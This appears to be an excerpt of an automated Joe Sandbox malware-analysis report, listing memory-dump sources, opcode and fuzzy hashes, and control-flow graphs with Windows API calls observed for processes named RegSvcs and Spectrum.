                                                                                                                                                                                • Instruction ID: f44fd960d725c2661d4539b49a1d93e50f8e843b40b026ce55555bb3e205c13f
                                                                                                                                                                                • Opcode Fuzzy Hash: 109866c7cfab0295f34bcb3f58dce4037161f8d15087c645d81e172418099066
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AC1B174E00218CFDB54DFA5D984BADBBB6EF89304F2080A9D808AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d0dad9e72f1030827b0e5c8cbb5c5b56d55e1afe54ba189376d50bd61244b7b8
                                                                                                                                                                                • Instruction ID: d84dd1ed768dc82eddc50adf5a2c2676e88fd2246af11e2afa4145c10a4363f9
                                                                                                                                                                                • Opcode Fuzzy Hash: d0dad9e72f1030827b0e5c8cbb5c5b56d55e1afe54ba189376d50bd61244b7b8
                                                                                                                                                                                • Instruction Fuzzy Hash: FFC1B174E00218CFDB54DFA5D984BADBBB6EF89300F2090A9D808AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46bc2e3437ac05110e83e3bf66022489160734e2a8de962d0a26e27881c12b69
                                                                                                                                                                                • Instruction ID: 2a869c0d98f698c8654546051ba001ad4b7b7beafd6184b26f7bdc3f7b1c3a61
                                                                                                                                                                                • Opcode Fuzzy Hash: 46bc2e3437ac05110e83e3bf66022489160734e2a8de962d0a26e27881c12b69
                                                                                                                                                                                • Instruction Fuzzy Hash: 75C1A174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0c5320ba387075df36ac850b9089433b2cd59d864c0bc26d98f7bae77b39ddfe
                                                                                                                                                                                • Instruction ID: 51d4ebbb4e95662729024f77d55a00db47e89ccefdec105d1f863e985612699d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c5320ba387075df36ac850b9089433b2cd59d864c0bc26d98f7bae77b39ddfe
                                                                                                                                                                                • Instruction Fuzzy Hash: E9C1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8fd6752965831b56689a73e41cd18442c935409df0d76e269b0d0e38a57ca1a7
                                                                                                                                                                                • Instruction ID: ee158a81ebfff3e80ae7b852f793b44ad5aaadefdae7b4423345180384617f15
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fd6752965831b56689a73e41cd18442c935409df0d76e269b0d0e38a57ca1a7
                                                                                                                                                                                • Instruction Fuzzy Hash: B9C1B274E00218CFDB54DFA5D944BADBBB6AF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5702790a1bc0006afc9108266afd224c26072e0d65c9551e85de85ba7e2c0835
                                                                                                                                                                                • Instruction ID: 9db73070a87f4ac85c75caf617d82b5f075fcac96e49d2a1d4568fc510f65165
                                                                                                                                                                                • Opcode Fuzzy Hash: 5702790a1bc0006afc9108266afd224c26072e0d65c9551e85de85ba7e2c0835
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC1C274E00218CFDB54DFA5D944BADBBB6AF89300F2080A9D809AB355DB359E85CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca4ac5f827de01e067d51a55a5a124da561923c34ed779d8617c036e4331bc2f
                                                                                                                                                                                • Instruction ID: 77af1800a882ad960d208e9283e0b327c89db779fba17f8c9e90b13863310154
                                                                                                                                                                                • Opcode Fuzzy Hash: ca4ac5f827de01e067d51a55a5a124da561923c34ed779d8617c036e4331bc2f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FC1C274E00218CFDB54DFA5D984BADBBB6AF89300F2080A9D809AB355DB359D85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c9c8277b707b463f67b166b6d761f47af5d72d57d6e5a651c5a3a65f1a7102ca
                                                                                                                                                                                • Instruction ID: 30b3120978f8999fe71db077e1855057387839c7285c74f347219bcf087018ee
                                                                                                                                                                                • Opcode Fuzzy Hash: c9c8277b707b463f67b166b6d761f47af5d72d57d6e5a651c5a3a65f1a7102ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 25C1C074E00218CFDB54DFA5D984BADBBB6BF89300F2090A9D809AB355DB359E85CF50
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
Similarity
• API ID:
• String ID: \;]q$\;]q$\;]q$\;]q
• API String ID: 0-2351511683

Execution Graph

Execution Coverage: 5.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 53
Total number of Limit Nodes: 4

Control-flow Graph
Memory Dump Source
• Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
Similarity
• API ID: CreateThread$CloseHandle
• String ID:
• API String ID: 738052048-0

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 246 7b5d50-7b5d5b CreateThread 247 7b5c78 246->247 248 7b5d1f-7b5d45 247->248 249 7b5c7e 247->249 252 7b5d47 248->252 253 7b5cd4-7b5cea CreateThread CloseHandle 248->253 249->248 250 7b5c84 249->250 250->246 252->253 254 7b5d8b-7b5d92 253->254 255 7b5cf0-7b5d4d 253->255 258 7b5d9c 254->258 259 7b5d94 254->259 255->259 261 7b5da5-7b5db6 call 7b52d0 258->261 262 7b5c2c-7b5c2f 259->262 263 7b5cb3 259->263 271 7b5dbc 261->271 272 7b5c30-7b5c39 261->272 263->262 264 7b5cb9-7b5cbd 263->264 266 7b5cc3 264->266 267 7b5d56-7b5d5b CreateThread 264->267 266->267 269 7b5cc9 266->269 267->247 269->267 273 7b5dbe 271->273 274 7b5d7d-7b5d89 271->274 272->264 279 7b5bf7 272->279 273->274 280 7b5d9b 273->280 274->254 274->259 279->264 281 7b5bfd-7b5c06 279->281 280->258 281->261
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: 5c5e8480aa51955ed6346f34c8d84f13a2ffbd45bc013f81e2dd86c16611a691
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 41B01200228FC7450026173045883A84AC02E47634DB41F6C9F73068D2D82D0C047734

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 283 7b5990-7b599b 285 7b5a33-7b5a61 call 7e9b00 283->285 286 7b59a1 283->286 297 7b5a63 285->297 298 7b5ab4-7b5aba call 7d1080 285->298 286->285 288 7b59a7-7b59ab 286->288 291 7b5a59 288->291 292 7b59b1-7b59f3 call 7e2320 288->292 294 7b5a5b 291->294 295 7b5a25-7b5a2d 291->295 292->291 313 7b59f5-7b59fa 292->313 294->295 305 7b5a23 294->305 302 7b5a2f 295->302 303 7b5a70-7b5a7b 295->303 297->298 300 7b5a65 297->300 316 7b5a83-7b5a88 call 7b5df0 298->316 319 7b5a13 298->319 300->303 302->300 306 7b5a7d 303->306 307 7b5a16-7b5a1e call 7d1470 303->307 311 7b5a24 305->311 306->307 312 7b5a7f-7b5a81 306->312 320 7b5a96-7b5ac2 307->320 312->316 317 7b59fc 313->317 318 7b5a51-7b5a54 call 7e233c 313->318 325 7b5a8d VirtualAlloc 316->325 317->318 322 7b59fe-7b5a02 317->322 318->291 319->316 324 7b5a15 319->324 320->311 327 7b5ac8 320->327 322->318 324->307 325->320 327->311 328 7b5ace 327->328 328->285
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1284135714-0
                                                                                                                                                                                • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction ID: e1b1a63e853ca873728cbfd544939baa69e96ce13917b88ea1574e80835e1b6f
                                                                                                                                                                                • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                • Instruction Fuzzy Hash: CB21D82151DE84CFC76AA32854E53FA2EA2F799324F5883DBD086FB182D93D5D059242

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 330 7b8245-7b8247 331 7b824d-7b824f 330->331 332 7b82d2-7b82d7 330->332 333 7b8251-7b8260 call 7e72f4 331->333 334 7b8306-7b8309 332->334 344 7b8390-7b8393 333->344 336 7b830b-7b8311 CloseHandle 334->336 337 7b832e-7b8330 334->337 336->337 338 7b82dd-7b82e3 337->338 339 7b8332 337->339 342 7b82e9 338->342 343 7b83a3-7b83a4 338->343 339->338 341 7b8334 339->341 345 7bf524-7bf52e 341->345 342->343 346 7b82ef 342->346 343->345 347 7b8399 344->347 348 7b827e 344->348 350 7bf807 345->350 352 7b82f0-7b831c 346->352 347->348 351 7b839f-7b83a1 347->351 348->336 349 7b8284 348->349 349->337 353 7bf8df-7bf8e0 350->353 354 7bf80d 350->354 351->343 363 7b8322 352->363 364 7b81e5 352->364 357 7c15a5-7c15aa 353->357 354->353 356 7bf813 354->356 359 7bf81b 356->359 360 7bf78f 356->360 361 7c15ae-7c15af 357->361 359->353 360->359 365 7bf795 360->365 366 7c15b2-7c15b7 361->366 363->364 370 7b8328-7b832c 363->370 368 7b81eb 364->368 369 7b82a3-7b82a5 364->369 365->350 367 7c15ba-7c15c1 366->367 371 7c15c7-7c15d2 367->371 372 7c1750-7c17a2 call 7e72f4 367->372 375 7b82b2-7b82bc 368->375 376 7b81f1 368->376 373 7b82ab 369->373 374 7b83f9 369->374 370->337 377 7b82c5-7b82c8 370->377 379 7c15d4-7c15d6 371->379 380 7c1620-7c1623 371->380 373->374 381 7b82b1 373->381 374->332 384 7b83ff 374->384 375->377 382 7b8357-7b836f GetTokenInformation 375->382 376->375 385 7b81f7-7b828e 376->385 377->374 383 7b82ce 377->383 387 7c15dc-7c15df 379->387 388 7c1670-7c1684 379->388 389 7c1625-7c1628 380->389 390 7c16a0-7c16b4 380->390 381->375 398 7b8376-7b837b 382->398 391 7b828f-7b8303 call 7e72ec 383->391 392 7b82d0 383->392 384->345 387->367 397 7c15e1-7c15f6 387->397 388->357 400 7c168a-7c168d 388->400 389->367 399 7c162a-7c1636 389->399 394 7c16f4-7c16f5 390->394 395 7c16b6-7c16b9 390->395 391->334 424 7b834f-7b8355 391->424 392->332 392->391 413 7c16fe-7c170c 394->413 401 7c173a-7c173b 395->401 402 7c16bb 395->402 404 7c15fc-7c1600 397->404 405 7c16d2-7c16d7 397->405 398->352 406 7b8381 398->406 407 7c16dc-7c16ec 399->407 408 7c1638-7c1640 399->408 409 7c172f-7c1738 400->409 410 7c1693-7c1697 400->410 419 7c173f-7c1740 401->419 411 7c16bf-7c16cd 402->411 404->413 414 7c1606-7c1618 404->414 405->361 406->352 416 7b8387 406->416 407->371 415 7c16f2 407->415 417 7c170e-7c1727 408->417 418 7c1646-7c165f 408->418 409->419 410->411 420 7c1744-7c1748 413->420 414->366 415->372 416->344 421 7b8277-7b827a 416->421 417->371 422 7c172d 417->422 418->371 423 7c1665 418->423 419->420 425 7b827c 421->425 426 7b8241 421->426 422->372 423->372 428 7b8212-7b821a GetTokenInformation 424->428 429 7b8341 424->429 425->348 425->426 426->333 426->398 431 7b83af 428->431 432 7b8220-7b8234 428->432 429->428 430 7b8347 429->430 430->408 433 7b834d 430->433 431->333 435 7b83b5 431->435 439 7b823a 432->439 440 7b83d7-7b83dd 432->440 433->424 435->333 436 7b83bb-7b83ca 435->436 436->421 443 7b83d0 436->443 439->440 442 7b8240 439->442 440->374 445 7cb32e-7cb330 442->445 443->421 446 7b83d6 443->446 447 7cb300 445->447 448 7cb332-7cb337 call 7e72f4 445->448 446->440 452 7cb2fd 447->452 453 7cb302 447->453 448->447 454 7cb339 448->454 455 7cb2ff 452->455 456 7cb305 452->456 454->447 457 7cb33b-7cb33f 454->457 458 7cb308-7cb315 455->458 456->458 459 7cb322-7cb32d 456->459 457->458 458->456 461 7cb317 458->461 459->445 461->452
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction ID: 8ac859f39cc2494e46740a0c768f134e4913802c0f2b8a87c379b53869bb9d0a
                                                                                                                                                                                • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                • Instruction Fuzzy Hash: E7F0A43950DA818FDAAA871898507FA6BE4BF55F10B5900DED446CB122CE1C9C02D753

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 462 7b8318-7b831c 463 7b8322 462->463 464 7b81e5 462->464 463->464 467 7b8328-7b832c 463->467 465 7b81eb 464->465 466 7b82a3-7b82a5 464->466 470 7b82b2-7b82bc 465->470 471 7b81f1 465->471 468 7b82ab 466->468 469 7b83f9 466->469 472 7b832e-7b8330 467->472 473 7b82c5-7b82c8 467->473 468->469 476 7b82b1 468->476 479 7b83ff 469->479 480 7b82d2-7b82d7 469->480 470->473 477 7b8357-7b836f GetTokenInformation 470->477 471->470 481 7b81f7-7b828e 471->481 474 7b82dd-7b82e3 472->474 475 7b8332 472->475 473->469 478 7b82ce 473->478 483 7b82e9 474->483 484 7b83a3-7b83a4 474->484 475->474 482 7b8334 475->482 476->470 492 7b8376-7b837b 477->492 485 7b828f-7b8303 call 7e72ec 478->485 486 7b82d0 478->486 488 7bf524-7bf52e 479->488 487 7b8306-7b8309 480->487 482->488 483->484 493 7b82ef 483->493 484->488 485->487 506 7b834f-7b8355 485->506 486->480 486->485 487->472 494 7b830b-7b8311 CloseHandle 487->494 491 7bf807 488->491 498 7bf8df-7bf8e0 491->498 499 7bf80d 491->499 496 7b8381 492->496 497 7b82f0-7b831c 492->497 493->497 494->472 496->497 501 7b8387 496->501 497->463 497->464 507 7c15a5-7c15aa 498->507 499->498 503 7bf813 499->503 504 7b8390-7b8393 501->504 505 7b8277-7b827a 501->505 512 7bf81b 503->512 513 7bf78f 503->513 514 7b8399 504->514 515 7b827e 504->515 509 7b827c 505->509 510 7b8241 505->510 518 7b8212-7b821a GetTokenInformation 506->518 519 7b8341 506->519 516 7c15ae-7c15af 507->516 509->510 509->515 510->492 522 7b8251-7b8260 call 7e72f4 510->522 512->498 513->512 521 7bf795 513->521 514->515 523 7b839f-7b83a1 514->523 515->494 520 7b8284 515->520 524 7c15b2-7c15b7 516->524 528 7b83af 518->528 529 7b8220-7b8234 518->529 519->518 526 7b8347 519->526 520->472 521->491 522->504 523->484 525 7c15ba-7c15c1 524->525 530 7c15c7-7c15d2 525->530 531 7c1750-7c17a2 call 7e72f4 525->531 532 7c1638-7c1640 526->532 533 7b834d 526->533 528->522 536 7b83b5 528->536 555 7b823a 529->555 556 7b83d7-7b83dd 529->556 539 7c15d4-7c15d6 530->539 540 7c1620-7c1623 530->540 541 7c170e-7c1727 532->541 542 7c1646-7c165f 532->542 533->506 536->522 537 7b83bb-7b83ca 536->537 537->505 569 7b83d0 537->569 545 7c15dc-7c15df 539->545 546 7c1670-7c1684 539->546 548 7c1625-7c1628 540->548 549 7c16a0-7c16b4 540->549 541->530 550 7c172d 541->550 542->530 551 7c1665 542->551 545->525 554 7c15e1-7c15f6 545->554 546->507 558 7c168a-7c168d 546->558 548->525 557 7c162a-7c1636 548->557 552 7c16f4-7c16f5 549->552 553 7c16b6-7c16b9 549->553 550->531 551->531 570 7c16fe-7c170c 552->570 559 7c173a-7c173b 553->559 560 7c16bb 553->560 562 7c15fc-7c1600 554->562 563 7c16d2-7c16d7 554->563 555->556 564 7b8240 555->564 556->469 557->532 565 7c16dc-7c16ec 557->565 566 7c172f-7c1738 558->566 567 7c1693-7c1697 558->567 575 7c173f-7c1740 559->575 568 7c16bf-7c16cd 560->568 562->570 571 7c1606-7c1618 562->571 563->516 574 7cb32e-7cb330 564->574 565->530 572 7c16f2 565->572 566->575 567->568 569->505 576 7b83d6 569->576 577 7c1744-7c1748 570->577 571->524 572->531 578 7cb300 574->578 579 7cb332-7cb337 call 7e72f4 574->579 575->577 576->556 583 7cb2fd 578->583 584 7cb302 578->584 579->578 585 7cb339 579->585 586 7cb2ff 583->586 587 7cb305 583->587 585->578 588 7cb33b-7cb33f 585->588 589 7cb308-7cb315 586->589 587->589 590 7cb322-7cb32d 587->590 588->589 589->587 592 7cb317 589->592 590->574 592->583
                                                                                                                                                                                APIs
                                                                                                                                                                                • CloseHandle.KERNELBASE ref: 007B830B
                                                                                                                                                                                • GetTokenInformation.KERNELBASE ref: 007B8369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleInformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3954737543-0
                                                                                                                                                                                • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction ID: 2eba3a28543f90b14d7c8f56b82c3516e1512b792baac05b568a138bf38ba66a
                                                                                                                                                                                • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DF0903440DA458B8AB58B18D8407FA67A87F21F50B6C005EC446CB122CE2CDD42EB53

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 593 7b83e7-7b83e9 594 7b83ef 593->594 595 7b82c5-7b82c8 593->595 594->595 598 7b83f5-7b83f7 594->598 596 7b83f9 595->596 597 7b82ce 595->597 601 7b83ff 596->601 602 7b82d2-7b82d7 596->602 599 7b828f-7b8303 call 7e72ec 597->599 600 7b82d0 597->600 598->596 604 7b8306-7b8309 599->604 618 7b834f-7b8355 599->618 600->599 600->602 605 7bf524-7bf52e 601->605 602->604 608 7b830b-7b8311 CloseHandle 604->608 609 7b832e-7b8330 604->609 607 7bf807 605->607 613 7bf8df-7bf8e0 607->613 614 7bf80d 607->614 608->609 611 7b82dd-7b82e3 609->611 612 7b8332 609->612 616 7b82e9 611->616 617 7b83a3-7b83a4 611->617 612->611 615 7b8334 612->615 622 7c15a5-7c15aa 613->622 614->613 619 7bf813 614->619 615->605 616->617 621 7b82ef 616->621 617->605 624 7b8212-7b821a GetTokenInformation 618->624 625 7b8341 618->625 626 7bf81b 619->626 627 7bf78f 619->627 633 7b82f0-7b831c 621->633 628 7c15ae-7c15af 622->628 630 7b83af 624->630 631 7b8220-7b8234 624->631 625->624 629 7b8347 625->629 626->613 627->626 632 7bf795 627->632 634 7c15b2-7c15b7 628->634 636 7c1638-7c1640 629->636 637 7b834d 629->637 640 7b8251-7b8256 call 7e72f4 630->640 641 7b83b5 630->641 662 7b823a 631->662 663 7b83d7-7b83dd 631->663 632->607 657 7b8322 633->657 658 7b81e5 633->658 635 7c15ba-7c15c1 634->635 643 7c15c7-7c15d2 635->643 644 7c1750-7c17a2 call 7e72f4 635->644 646 7c170e-7c1727 636->646 647 7c1646-7c165f 636->647 637->618 653 7b825b-7b8260 640->653 641->640 642 7b83bb-7b83ca 641->642 688 7b83d0 642->688 689 7b8277-7b827a 642->689 650 7c15d4-7c15d6 643->650 651 7c1620-7c1623 643->651 646->643 654 7c172d 646->654 647->643 655 7c1665 647->655 660 7c15dc-7c15df 650->660 661 7c1670-7c1684 650->661 664 7c1625-7c1628 651->664 665 7c16a0-7c16b4 651->665 666 7b8390-7b8393 653->666 654->644 655->644 657->658 675 7b8328-7b832c 657->675 673 7b81eb 658->673 674 7b82a3-7b82a5 658->674 660->635 670 7c15e1-7c15f6 660->670 661->622 676 7c168a-7c168d 661->676 662->663 671 7b8240 662->671 663->596 664->635 672 7c162a-7c1636 664->672 667 7c16f4-7c16f5 665->667 668 7c16b6-7c16b9 665->668 677 7b8399 666->677 678 7b827e 666->678 695 7c16fe-7c170c 667->695 685 7c173a-7c173b 668->685 686 7c16bb 668->686 679 7c15fc-7c1600 670->679 680 7c16d2-7c16d7 670->680 692 7cb32e-7cb330 671->692 672->636 681 7c16dc-7c16ec 672->681 693 7b82b2-7b82bc 673->693 694 7b81f1 673->694 674->596 690 7b82ab 674->690 675->595 675->609 682 7c172f-7c1738 676->682 683 7c1693-7c1697 676->683 677->678 684 7b839f-7b83a1 677->684 678->608 687 7b8284 678->687 679->695 696 7c1606-7c1618 679->696 680->628 681->643 702 7c16f2 681->702 705 7c173f-7c1740 682->705 697 7c16bf-7c16cd 683->697 684->617 685->705 686->697 687->609 688->689 700 7b83d6 688->700 698 7b827c 689->698 699 7b8241 689->699 690->596 701 7b82b1 690->701 706 7cb300 692->706 707 7cb332-7cb337 call 7e72f4 692->707 693->595 703 7b8357-7b836f GetTokenInformation 693->703 694->693 704 7b81f7-7b828e 694->704 711 7c1744-7c1748 695->711 696->634 698->678 698->699 699->640 710 7b8376-7b837b 699->710 700->663 701->693 702->644 703->710 705->711 714 7cb2fd 706->714 715 7cb302 706->715 707->706 717 7cb339 707->717 710->633 716 7b8381 710->716 719 7cb2ff 714->719 720 7cb305 714->720 716->633 718 7b8387 716->718 717->706 721 7cb33b-7cb33f 717->721 718->666 718->689 722 7cb308-7cb315 719->722 720->722 723 7cb322-7cb32d 720->723 721->722 722->720 725 7cb317 722->725 723->692 725->714
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.3359629392.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7b0000_Spectrum.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                • Instruction ID: d6ea867c579ad27c5b804cb8021605781ceb8ff7e06e990d4960ba0c324b38f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
